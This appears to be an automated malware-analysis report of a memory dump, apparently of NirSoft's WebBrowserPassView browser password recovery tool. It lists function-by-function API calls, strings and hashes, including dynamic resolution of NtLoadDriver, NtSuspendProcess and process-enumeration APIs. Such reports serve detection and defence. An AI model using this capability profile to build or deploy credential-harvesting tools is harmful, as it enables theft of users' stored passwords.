                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                    • API String ID: 1223191525-1542517562
                                                                                                    • Opcode ID: 99d0eee2a2c09ba556b3b7b6cfbec8aad1b2bcf322182548da21104f5f3ae4f2
                                                                                                    • Instruction ID: 73eddad5637f0acf7d1af7b6f707e7c00569a6f8ee304d1bebea6c0fe08eda79
                                                                                                    • Opcode Fuzzy Hash: 99d0eee2a2c09ba556b3b7b6cfbec8aad1b2bcf322182548da21104f5f3ae4f2
                                                                                                    • Instruction Fuzzy Hash: A24114B6900219BAE704EFE1DD81EDEB7BCEF08704B504517B605A3141DBB8AA55CBE8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D0A1, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D0E4
                                                                                                    • memset.MSVCRT ref: 0040D0F9
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040D10B
                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040D129
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040D142
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040D14D
                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040D166
                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040D17A
                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040D185
                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040D19D
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040D1A9
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1B8
                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 0040D1CA
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1D5
                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 0040D1E7
                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040D1F8
                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040D200
                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040D21B
                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040D22B
                                                                                                    • DeleteObject.GDI32(?), ref: 0040D237
                                                                                                    • DeleteObject.GDI32(?), ref: 0040D23D
                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040D25A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 304928396-0
                                                                                                    • Opcode ID: 8d81033790000e0211d0c165e20e29bf5598fef6e5276f3925fa816c4a1f459c
                                                                                                    • Instruction ID: 16657fc5a2c8573fc16e3979eed5d56fb96c4ac25c938f86d44a027ef3067e24
                                                                                                    • Opcode Fuzzy Hash: 8d81033790000e0211d0c165e20e29bf5598fef6e5276f3925fa816c4a1f459c
                                                                                                    • Instruction Fuzzy Hash: 27419875640304BFE7209FB0DC4AF9777ADFB49745F000829B399A61D1C6B5A8509B29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041046C, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00408BDD,?,000000FF,00000000,00000104), ref: 0041047F
                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00410496
                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 004104A8
                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 004104BA
                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 004104CC
                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004104DE
                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004104F0
                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00410502
                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 00410514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                    • API String ID: 667068680-2887671607
                                                                                                    • Opcode ID: dae582f720d61d593808f0ee1107545a85994782ec7e4d96b0576c386b96eb39
                                                                                                    • Instruction ID: 9f46f3b5dd6607fa295a0805728c1be034435a694e6ece6019e6d01140c3b6a7
                                                                                                    • Opcode Fuzzy Hash: dae582f720d61d593808f0ee1107545a85994782ec7e4d96b0576c386b96eb39
                                                                                                    • Instruction Fuzzy Hash: DA018475D80324ABEB119F71BE09A063EA1F71675A7150537F81852272EBF9C060EE4D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004035D0, Relevance: 27.1, APIs: 18, Instructions: 66windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D0A1: memset.MSVCRT ref: 0040D0E4
                                                                                                      • Part of subcall function 0040D0A1: memset.MSVCRT ref: 0040D0F9
                                                                                                      • Part of subcall function 0040D0A1: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040D10B
                                                                                                      • Part of subcall function 0040D0A1: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040D129
                                                                                                      • Part of subcall function 0040D0A1: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040D166
                                                                                                      • Part of subcall function 0040D0A1: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040D17A
                                                                                                      • Part of subcall function 0040D0A1: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040D185
                                                                                                      • Part of subcall function 0040D0A1: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040D19D
                                                                                                      • Part of subcall function 0040D0A1: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040D1A9
                                                                                                      • Part of subcall function 0040D0A1: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1B8
                                                                                                      • Part of subcall function 0040D0A1: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 0040D1CA
                                                                                                      • Part of subcall function 0040D0A1: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1D5
                                                                                                      • Part of subcall function 0040D0A1: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 0040D1E7
                                                                                                      • Part of subcall function 0040D0A1: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040D1F8
                                                                                                      • Part of subcall function 0040D0A1: GetSysColor.USER32(0000000F), ref: 0040D200
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035E2
                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035ED
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 004035FE
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403602
                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 00403607
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403612
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403616
                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 0040361B
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403626
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362A
                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040362F
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040363A
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040363E
                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403643
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 0040364E
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403652
                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403657
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403662
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 792915304-0
                                                                                                    • Opcode ID: 757be9bfa998a82650df5df78d766fa05f28d783195ee80347c21a4463d7fdfa
                                                                                                    • Instruction ID: 61be09eb7d9e1b319ab0b7d002ac40d302a5655e1a8cb4fc6dfd5430bf30455e
                                                                                                    • Opcode Fuzzy Hash: 757be9bfa998a82650df5df78d766fa05f28d783195ee80347c21a4463d7fdfa
                                                                                                    • Instruction Fuzzy Hash: 69012CA07957087AF63037B2EC4FF6B7B5EDF81B49F224410F30C990E0C9A6AC104928
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004090C7, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405A09: _wcsicmp.MSVCRT ref: 00405A3A
                                                                                                      • Part of subcall function 00405D08: memset.MSVCRT ref: 00405E04
                                                                                                    • free.MSVCRT(00000000), ref: 004092B6
                                                                                                      • Part of subcall function 00408B2B: _wcsicmp.MSVCRT ref: 00408B44
                                                                                                    • memset.MSVCRT ref: 0040919C
                                                                                                      • Part of subcall function 00408303: wcslen.MSVCRT ref: 00408316
                                                                                                      • Part of subcall function 00408303: memcpy.MSVCRT ref: 00408335
                                                                                                    • wcschr.MSVCRT ref: 004091D4
                                                                                                    • memcpy.MSVCRT ref: 00409208
                                                                                                    • memcpy.MSVCRT ref: 00409223
                                                                                                    • memcpy.MSVCRT ref: 0040923E
                                                                                                    • memcpy.MSVCRT ref: 00409259
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                    • Opcode ID: e678fa25e55bf711412632c618e802e2be1a47463d2cb045bdab479706874e36
                                                                                                    • Instruction ID: 6962f2612a79fcd7d182822bc80251e06ab6148b2c11a72e9aa23e2a85594cb8
                                                                                                    • Opcode Fuzzy Hash: e678fa25e55bf711412632c618e802e2be1a47463d2cb045bdab479706874e36
                                                                                                    • Instruction Fuzzy Hash: 4851CDB1E00209AAEF10EFA5DD45A9FB7B8AF44704F14447FB514B7292EA78AD04CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B143, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B169
                                                                                                    • memset.MSVCRT ref: 0040B185
                                                                                                      • Part of subcall function 00407845: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040B282,00000000,0040B135,?,00000000,00000208,?), ref: 00407850
                                                                                                      • Part of subcall function 004424E8: GetFileVersionInfoSizeW.VERSION(0040B1B7,?,00000000), ref: 004424FE
                                                                                                      • Part of subcall function 004424E8: ??2@YAPAXI@Z.MSVCRT ref: 00442519
                                                                                                      • Part of subcall function 004424E8: GetFileVersionInfoW.VERSION(0040B1B7,00000000,?,00000000,00000000,0040B1B7,?,00000000), ref: 00442529
                                                                                                      • Part of subcall function 004424E8: VerQueryValueW.VERSION(00000000,004493C0,0040B1B7,?,0040B1B7,00000000,?,00000000,00000000,0040B1B7,?,00000000), ref: 0044253C
                                                                                                      • Part of subcall function 004424E8: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004493C0,0040B1B7,?,0040B1B7,00000000,?,00000000,00000000,0040B1B7,?,00000000), ref: 00442579
                                                                                                      • Part of subcall function 004424E8: _snwprintf.MSVCRT ref: 00442599
                                                                                                      • Part of subcall function 004424E8: wcscpy.MSVCRT ref: 004425C3
                                                                                                    • wcscpy.MSVCRT ref: 0040B1C9
                                                                                                    • wcscpy.MSVCRT ref: 0040B1D8
                                                                                                    • wcscpy.MSVCRT ref: 0040B1E8
                                                                                                    • EnumResourceNamesW.KERNEL32(0040B2E7,00000004,0040AF17,00000000), ref: 0040B24D
                                                                                                    • EnumResourceNamesW.KERNEL32(0040B2E7,00000005,0040AF17,00000000), ref: 0040B257
                                                                                                    • wcscpy.MSVCRT ref: 0040B25F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                    • API String ID: 3037099051-517860148
                                                                                                    • Opcode ID: eaebc5712ba737e0e8f766ecf52aeb63a0c0dfccaee27a64a8588b389f01c1fc
                                                                                                    • Instruction ID: 1be70d594a2b227d66c3c974b11b9a48014d15157b7525213fd5e6de5bca4a02
                                                                                                    • Opcode Fuzzy Hash: eaebc5712ba737e0e8f766ecf52aeb63a0c0dfccaee27a64a8588b389f01c1fc
                                                                                                    • Instruction Fuzzy Hash: C321E8B29402183AE720B7528C47FCB3B6CEF50754F04007BB50872192DAB85A9486AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041162B, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(psapi.dll,?,00410104), ref: 0041163E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00411657
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00411668
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00411679
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041168A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041169B
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004116BB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-70141382
                                                                                                    • Opcode ID: 13a29ec6702f7d46e3e331efc3a7d8f6de7120db5b6625a017cf2bcffd173f38
                                                                                                    • Instruction ID: 461624a80e0d07badcd366824de7568107f00425e1770072281a9fef3b9add44
                                                                                                    • Opcode Fuzzy Hash: 13a29ec6702f7d46e3e331efc3a7d8f6de7120db5b6625a017cf2bcffd173f38
                                                                                                    • Instruction Fuzzy Hash: AC01B1B0641311EBE7118F246D44FB73EF86792B86B18013BE800D12B5DB7CC481CA6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004115A7, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041010B), ref: 004115B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004115CF
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004115E0
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004115F1
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411602
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411613
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                    • API String ID: 667068680-3953557276
                                                                                                    • Opcode ID: 5f3bb632f845f63d4361bb423715a6115934312857fb485e4902f4d3b8bb0ee4
                                                                                                    • Instruction ID: 43c222f580a7cff9d3bb8b0fabefeabac9bd6aa2272d4b4d2b78040244673e94
                                                                                                    • Opcode Fuzzy Hash: 5f3bb632f845f63d4361bb423715a6115934312857fb485e4902f4d3b8bb0ee4
                                                                                                    • Instruction Fuzzy Hash: DFF08B70942311AAB7108B255E00F673BEC9799B42F18013BB500D1274E77DC481CB6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004033C7, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407441: wcslen.MSVCRT ref: 0040744E
                                                                                                      • Part of subcall function 00407441: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040C419,00000000,00444990,00000000,0040CE28,00000000), ref: 0040745D
                                                                                                    • memset.MSVCRT ref: 004033FD
                                                                                                    • memset.MSVCRT ref: 00403412
                                                                                                    • memset.MSVCRT ref: 00403427
                                                                                                    • _snwprintf.MSVCRT ref: 0040344F
                                                                                                    • wcscpy.MSVCRT ref: 0040346B
                                                                                                    • _snwprintf.MSVCRT ref: 004034AE
                                                                                                    Strings
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033D7
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403465
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034A1
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403442
                                                                                                    • WebBrowserPassView, xrefs: 00403493
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
                                                                                                    • API String ID: 2731979376-1376879643
                                                                                                    • Opcode ID: a0d2f4cb7af018177644f7102c2b94f38bb28d90939cf9570fe4997ad7ebe66c
                                                                                                    • Instruction ID: 8be3b8919f415e7afd65bd47c3f181a946a1b7b45b4bd433be39d7ed74d6d3f7
                                                                                                    • Opcode Fuzzy Hash: a0d2f4cb7af018177644f7102c2b94f38bb28d90939cf9570fe4997ad7ebe66c
                                                                                                    • Instruction Fuzzy Hash: E92182B2D4021C7AEB21AB95CC41FEB37BCFB48745F0040ABB509A2151DA789B848B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E618, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 153windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040E673
                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040E681
                                                                                                    • SelectObject.GDI32(?,?), ref: 0040E696
                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040E6CC
                                                                                                    • SelectObject.GDI32(00000014,00000000), ref: 0040E6D6
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040E6F1
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 0040E6FA
                                                                                                    • SetCursor.USER32(00000000), ref: 0040E701
                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040E747
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
                                                                                                    • String ID: WebBrowserPassView
                                                                                                    • API String ID: 101102110-2171583229
                                                                                                    • Opcode ID: f0004a123e2ba00ad228b1bcedea9c59c3c59ff0e3bc4a33ab55178d9b981fec
                                                                                                    • Instruction ID: b6a0abf4ea26cf3cd1d0305318040a160c90159364326ad8385770d720aedbfe
                                                                                                    • Opcode Fuzzy Hash: f0004a123e2ba00ad228b1bcedea9c59c3c59ff0e3bc4a33ab55178d9b981fec
                                                                                                    • Instruction Fuzzy Hash: 3A510335600505EBDB20AF66CC89B6AB7A5FF44300F10493AF605F72E2C778AC218B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409647, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00409813,?,?,0040987D,00000000), ref: 00409667
                                                                                                      • Part of subcall function 00407E9C: SetFilePointer.KERNEL32(0040987D,?,00000000,00000000,?,00409688,00000000,00000000,?,00000020,?,00409813,?,?,0040987D,00000000), ref: 00407EA9
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409697
                                                                                                      • Part of subcall function 004095B6: _memicmp.MSVCRT ref: 004095D0
                                                                                                      • Part of subcall function 004095B6: memcpy.MSVCRT ref: 004095E7
                                                                                                    • memcpy.MSVCRT ref: 004096DE
                                                                                                    • strchr.MSVCRT ref: 00409703
                                                                                                    • strchr.MSVCRT ref: 00409714
                                                                                                    • _strlwr.MSVCRT ref: 00409722
                                                                                                    • memset.MSVCRT ref: 0040973D
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040978A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                    • String ID: 4$h
                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                    • Opcode ID: e11c55422dbe39069aef216f9f1a39b004af483c832da06e19baf019ae5057b4
                                                                                                    • Instruction ID: debcee51cc52e0310c54dc6a14aa64b7fa573326c546e717892eb3ebe1fe88f7
                                                                                                    • Opcode Fuzzy Hash: e11c55422dbe39069aef216f9f1a39b004af483c832da06e19baf019ae5057b4
                                                                                                    • Instruction Fuzzy Hash: 26318172900108BEEB11EFA5CC85BAE77BCEB04314F10406AFA08A7181E7799F548B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412537, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: %%0.%df
                                                                                                    • API String ID: 3473751417-763548558
                                                                                                    • Opcode ID: 7fba93e751089c11a62490c152b2a15d4aff7195ab3d655da4a4e8f30a485701
                                                                                                    • Instruction ID: 0e8cebb363b6723a8c61929d716705325c35f30f887c3809501d2c99a803effa
                                                                                                    • Opcode Fuzzy Hash: 7fba93e751089c11a62490c152b2a15d4aff7195ab3d655da4a4e8f30a485701
                                                                                                    • Instruction Fuzzy Hash: 053130B1940129ABEB20DF95CC85FEB777CFF49304F4100EAB509E2151EB749A94CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004116C3, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 004116DC
                                                                                                    • wcscpy.MSVCRT ref: 004116EC
                                                                                                      • Part of subcall function 00407543: wcslen.MSVCRT ref: 00407552
                                                                                                      • Part of subcall function 00407543: wcslen.MSVCRT ref: 0040755C
                                                                                                      • Part of subcall function 00407543: _memicmp.MSVCRT ref: 00407577
                                                                                                    • wcscpy.MSVCRT ref: 0041173B
                                                                                                    • wcscat.MSVCRT ref: 00411746
                                                                                                    • memset.MSVCRT ref: 00411722
                                                                                                      • Part of subcall function 004079EE: GetWindowsDirectoryW.KERNEL32(00452698,00000104,?,0041177B,?,?,00000000,00000208,?), ref: 00407A04
                                                                                                      • Part of subcall function 004079EE: wcscpy.MSVCRT ref: 00407A14
                                                                                                    • memset.MSVCRT ref: 0041176A
                                                                                                    • memcpy.MSVCRT ref: 00411785
                                                                                                    • wcscat.MSVCRT ref: 00411791
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                    • Opcode ID: 77e111dd2f93fd6d795d88aed31b31755cc48ae573540e03b4ba725fff11ab48
                                                                                                    • Instruction ID: c22a1bb6783f8e4af96defd9733d9a6a7a7663329d04dbf7ea6284789ac930f9
                                                                                                    • Opcode Fuzzy Hash: 77e111dd2f93fd6d795d88aed31b31755cc48ae573540e03b4ba725fff11ab48
                                                                                                    • Instruction Fuzzy Hash: 2621D7B6C0530869F721E7618D8AEEB63AC9F04314F60415FF229E20D2FA7CA981475E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040762E, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00407638
                                                                                                      • Part of subcall function 0040740F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00442ACA,00000000,?,00000000,00000000,00410EBE,?,?), ref: 00407421
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00407655
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407666
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00407673
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407686
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00407698
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004076A1
                                                                                                    • GetLastError.KERNEL32 ref: 004076A9
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004076B5
                                                                                                    • GetLastError.KERNEL32 ref: 004076C0
                                                                                                    • CloseClipboard.USER32 ref: 004076C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                    • String ID:
